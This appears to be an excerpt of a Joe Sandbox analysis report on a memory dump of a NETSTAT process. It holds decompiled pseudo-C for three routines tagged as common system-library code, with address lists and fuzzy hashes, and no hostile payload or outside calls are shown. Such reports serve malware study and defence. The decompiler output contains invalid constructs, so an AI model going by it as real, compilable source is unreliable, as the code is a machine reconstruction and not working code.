0x02ed6de5
0x02ed6deb
0x02ed6df1
0x02ed6df7
0x02ed6dfd
0x02ed6e01
0x02ed6e05
0x02ed6e09
0x02ed6e0d
0x02ed6e11
0x02ed6e11
0x02e951eb
0x02ed6e1a
0x02ed6e1f
0x02ed6e21
0x02ed6e23
0x00000000
0x02e951f1
0x02e951f1
0x00000000
0x02e951f1

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c253d1573cfe667b1fda00a2f221fd693b51be40e4b1f27510da0ecc41689ac
Instruction ID: 898eaf99c2066d9208dc1c61df46f09d242af83d098c928a15c410aae0c3d130
Opcode Fuzzy Hash: 1c253d1573cfe667b1fda00a2f221fd693b51be40e4b1f27510da0ecc41689ac
Instruction Fuzzy Hash: 0BC121755483808FD355CF29C580A6AFBF1BF88308F149A6EF8998B352D771E946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02E903E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E02E903E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x2f5d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E02E90548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E02EAB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E02E7B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x2f57c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E02E87D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E02E87D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E02EE7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E02EA9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E02EE69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x2f57c04 != 0) {
						_t118 = _v12;
						_t120 = E02EEA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x2f57bd8;
						if( *0x2f57bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E02EA95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E02EA99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E02EE3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E02E6B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E02EAAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x2f58474 - 3;
										if( *0x2f58474 != 3) {
											 *0x2f579dc =  *0x2f579dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E02E87D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E02E87D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E02EE7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x2f58708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x2f57b00; // 0x0
							asm("ror esi, cl");
							 *0x2f5b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E02EA95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E02E77F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x02e903f1
0x02e903f7
0x02e903f9
0x02e903fb
0x02e903fd
0x02e90400
0x02e9040a
0x02ed4c7a
0x02e90537
0x02e90547
0x02e90410
0x02e90410
0x02e90414
0x02e90417
0x02e9041a
0x02e90421
0x02e90424
0x02e9042b
0x02e9043b
0x02e9043e
0x02e9043f
0x02e9043f
0x02e90446
0x02e90449
0x02e9044c
0x02e9044f
0x02e90459
0x02ed4c8d
0x02e9045f
0x02e9045f
0x02e9045f
0x02e90467
0x02ed4c97
0x02ed4c9d
0x02ed4ca4
0x02ed4caa
0x02ed4caf
0x02ed4cb1
0x02ed4cc3
0x02ed4cb3
0x02ed4cbc
0x02ed4cbc
0x02ed4cc8
0x02ed4ccb
0x02ed4cd7
0x02ed4cda
0x02ed4cdf
0x02ed4cdf
0x02ed4ccb
0x02ed4ca4
0x02e9046d
0x02e9046f
0x02e9046f
0x02e90471
0x02e90476
0x02e9047a
0x02e9047b
0x02e90483
0x02e90489
0x02e9048d
0x00000000
0x00000000
0x02ed4ce9
0x02ed4cef
0x02ed4d22
0x02ed4d22
0x00000000
0x02ed4d22
0x02ed4cf1
0x02ed4cf7
0x00000000
0x00000000
0x02ed4cf9
0x02ed4cff
0x00000000
0x00000000
0x02ed4d05
0x02ed4d07
0x00000000
0x00000000
0x02ed4d0d
0x02ed4d0f
0x02ed4d14
0x02ed4d16
0x00000000
0x00000000
0x02ed4d1c
0x02ed4d1c
0x02e90499
0x02e90535
0x02e90535
0x00000000
0x02e90535
0x02e904a6
0x02ed4d2c
0x02ed4d37
0x02ed4d39
0x02ed4d3b
0x00000000
0x00000000
0x02ed4d41
0x02ed4d48
0x02e90527
0x02e9052b
0x02e9052d
0x02e90530
0x02e90530
0x00000000
0x02e9052b
0x02ed4d4e
0x02e904ac
0x02e904ac
0x02e904af
0x02e904b2
0x02e904b7
0x02e904b9
0x02e904bb
0x02e904bd
0x02e904bf
0x02e904c5
0x02e904c9
0x02ed4d53
0x02ed4d59
0x02ed4db9
0x02ed4dba
0x02ed4dbf
0x02ed4dc2
0x02ed4dc4
0x02ed4dc7
0x02ed4dce
0x00000000
0x02ed4dce
0x02ed4d5b
0x02ed4d61
0x00000000
0x00000000
0x02ed4d63
0x02ed4d69
0x00000000
0x00000000
0x02ed4d6b
0x02ed4d6e
0x02ed4d74
0x02ed4d76
0x02ed4d7c
0x02ed4d7e
0x02ed4d84
0x02ed4d89
0x02ed4d8c
0x02ed4d8d
0x02ed4d92
0x02ed4d95
0x02ed4d96
0x02ed4d98
0x02ed4d9a
0x02ed4d9f
0x02ed4da4
0x02ed4da6
0x02ed4da8
0x02ed4daf
0x02ed4db1
0x02ed4db1
0x02ed4daf
0x02ed4da6
0x02ed4d84
0x02ed4d7c
0x00000000
0x02ed4d74
0x02e904d6
0x02ed4de1
0x02e904dc
0x02e904dc
0x02e904dc
0x02e904e4
0x02ed4deb
0x02ed4df1
0x02ed4df8
0x02ed4dfe
0x02ed4e03
0x02ed4e05
0x02ed4e17
0x02ed4e07
0x02ed4e10
0x02ed4e10
0x02ed4e1c
0x02ed4e1f
0x02ed4e35
0x02ed4e35
0x02ed4e1f
0x02ed4df8
0x02e904f1
0x02e904fa
0x02ed4e3f
0x02ed4e47
0x02ed4e5b
0x02ed4e61
0x02ed4e67
0x02ed4e69
0x02ed4e71
0x02ed4e73
0x02e90500
0x02e90500
0x02e90500
0x02e904fa
0x02e90508
0x02e9051d
0x02e9051d
0x02e9051f
0x02e90524
0x00000000
0x02e90524
0x02e90515
0x02e90517
0x02ed4e7a
0x02ed4e7c
0x00000000
0x00000000
0x02ed4e85
0x00000000
0x02ed4e85
0x00000000
0x02e90517

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be40836ab301d962ce76bbba922507f23692750e7a48941ae588bb0179238c1
Instruction ID: ab53ef69f419ef7a86cc567a5f69fa2eb146d937d79a6de1b6640c4b6664f709
Opcode Fuzzy Hash: 0be40836ab301d962ce76bbba922507f23692750e7a48941ae588bb0179238c1
Instruction Fuzzy Hash: 3F914B31EC0214AFEF319B68C844BADBBA5AB06718F05A262FD11AB2D0D7749D41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E6C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02E6C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x2f5d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E02E76D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E02EAB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x2f57b9c; // 0x0
					_t74 = L02E84620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E02EA9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L02E877F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E02EAF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E02EA13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L02E877F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E02EA9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x02e6c608
0x02e6c615
0x02e6c625
0x02e6c62d
0x02e6c635
0x02e6c640
0x02e6c680
0x02e6c687
0x02e6c688
0x02e6c689
0x02e6c694
0x02e6c694
0x02e6c642
0x02e6c64a
0x02e6c697
0x02ed7a25
0x02ed7a2b
0x02ed7a2e
0x02ed7a30
0x02ed7bea
0x02ed7bea
0x00000000
0x02ed7bea
0x02ed7a36
0x02ed7a43
0x02ed7a48
0x02ed7a4c
0x02ed7a4e
0x00000000
0x00000000
0x02ed7a58
0x02ed7a5a
0x02ed7a5b
0x02ed7a5c
0x02ed7a5d
0x02ed7a63
0x02ed7a64
0x02ed7a6a
0x02ed7a6c
0x02ed7a6e
0x02ed79cb
0x02ed79cb
0x02ed79ce
0x02ed79d0
0x02ed7a98
0x02ed7a9b
0x02ed7a9b
0x02ed7a9e
0x02ed7aa1
0x02ed7bbe
0x02ed7bbe
0x02ed7bc0
0x02ed7be0
0x02ed7be0
0x02ed7a01
0x02ed7a01
0x02ed7a05
0x02ed7a07
0x02ed7a15
0x02ed7a15
0x02ed7a1a
0x00000000
0x02ed7a1a
0x02ed7bc2
0x02ed7bc6
0x02ed7bc9
0x02ed7bcd
0x02ed7bcf
0x02ed79e6
0x02ed79e6
0x02ed79eb
0x02ed79eb
0x02ed79ef
0x02ed79f1
0x00000000
0x00000000
0x02ed79f3
0x02ed79f5
0x02ed79ff
0x02ed79ff
0x00000000
0x02ed79ff
0x02ed79f7
0x02ed79fd
0x00000000
0x00000000
0x00000000
0x02ed79fd
0x02ed7bd5
0x02ed7bd8
0x00000000
0x00000000
0x02ed7ba9
0x02ed7bac
0x02ed7bb0
0x02ed7bb1
0x02ed7bb1
0x02ed7bb6
0x00000000
0x02ed7bb6
0x02ed7aa7
0x02ed7aaa
0x00000000
0x00000000
0x02ed7ab2
0x02ed7ab3
0x02ed7ab5
0x02ed7aec
0x02ed7aef
0x02ed7b25
0x02ed7b28
0x02ed7b62
0x02ed7b64
0x02ed7b8f
0x02ed7b92
0x02ed7b96
0x02ed7b98
0x00000000
0x00000000
0x02ed7b9e
0x02ed7b9f
0x02ed7ba3
0x00000000
0x02ed7ba3
0x02ed7b66
0x02ed7b68
0x02ed7ae2
0x02ed7ae2
0x00000000
0x02ed7ae2
0x02ed7b6e
0x02ed7b72
0x02ed7b75
0x02ed7b81
0x02ed7b85
0x02ed7b87
0x00000000
0x00000000
0x02ed7b31
0x02ed7b34
0x02ed7b3c
0x02ed7b45
0x02ed7b46
0x02ed7b4f
0x02ed7b51
0x02ed7b57
0x02ed7b59
0x02ed7b59
0x00000000
0x02ed7b59
0x02ed7b77
0x00000000
0x02ed7b77
0x02ed7b2a
0x00000000
0x02ed7b2a
0x02ed7af1
0x02ed7af3
0x00000000
0x00000000
0x02ed7afb
0x02ed7afc
0x02ed7afe
0x00000000
0x00000000
0x02ed7b00
0x02ed7b03
0x00000000
0x00000000
0x02ed7b05
0x02ed7b09
0x02ed7b0d
0x02ed7b0f
0x00000000
0x00000000
0x02ed7b18
0x02ed7b1d
0x00000000
0x02ed7b1d
0x02ed7ab7
0x02ed7ab9
0x00000000
0x00000000
0x02ed7abf
0x02ed7ac1
0x00000000
0x00000000
0x02ed7ac3
0x02ed7ac6
0x00000000
0x00000000
0x02ed7ac8
0x02ed7acc
0x02ed7ad0
0x02ed7ad2
0x00000000
0x00000000
0x02ed7adb
0x00000000
0x02ed7adb
0x02ed79d6
0x02ed79d9
0x02ed79dc
0x02ed7a91
0x02ed7a94
0x00000000
0x02ed7a94
0x02ed79e2
0x00000000
0x02ed79e2
0x02ed7a74
0x02ed7a7a
0x00000000
0x00000000
0x02ed7a8a
0x02ed7a21
0x02ed7a21
0x00000000
0x02ed7a21
0x02e6c650
0x02e6c651
0x02e6c656
0x02e6c65c
0x02e6c65d
0x02e6c663
0x02e6c664
0x02e6c66a
0x02e6c66e
0x02ed79c5
0x02ed79c7
0x00000000
0x02ed79c7
0x02e6c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64a0ce56d4deadcd922244de0301f497bdd7c1dede0a536159fd0e47ac5633df
Instruction ID: 4bee4e385ab7bb44f2dd60c623b7ca71427826b4cf3f55a8cba103a844ee0702
Opcode Fuzzy Hash: 64a0ce56d4deadcd922244de0301f497bdd7c1dede0a536159fd0e47ac5633df
Instruction Fuzzy Hash: FB81A3766842418BCB25CF14C890B7EF7E5EB88398F15E85AFD459B244D330ED42CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02EFB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E02EFB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x2f57b9c; // 0x0
				_t124 = L02E84620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E02EA9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E02EA95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E02EA95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L02E877F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E02EA9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E02EA95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x2f57b9c; // 0x0
									_t92 = L02E84620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E02EA9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E02E6A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E02EFE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E02EFE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E02EA95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x02efb8d9
0x02efb8e4
0x00000000
0x02efb8e6
0x02efb8f3
0x02efb8f5
0x02efb8f5
0x02efb8f8
0x02efb920
0x02efb924
0x02efb936
0x02efb939
0x02efb93d
0x02efb948
0x02efb9a0
0x02efb9a0
0x02efb9a4
0x02efb9bf
0x02efb9c4
0x02efb9c6
0x02efb9cd
0x02efb9d1
0x02efbad4
0x02efbad8
0x02efbada
0x02efbadc
0x02efbadc
0x02efbadf
0x02efbae0
0x02efbae2
0x02efbae4
0x02efbaec
0x02efbaee
0x02efbaf0
0x02efbaf0
0x02efbaec
0x02efbafb
0x02efbafc
0x02efbafe
0x02efbb01
0x02efbb01
0x00000000
0x02efbb06
0x02efb9d7
0x02efb9db
0x02efb9db
0x02efb9de
0x02efb9de
0x02efb9e4
0x02efb9e7
0x02efb9ea
0x02efb9ec
0x02efb9ef
0x02efb9f3
0x02efba1b
0x02efba1b
0x02efba23
0x02efba24
0x02efba27
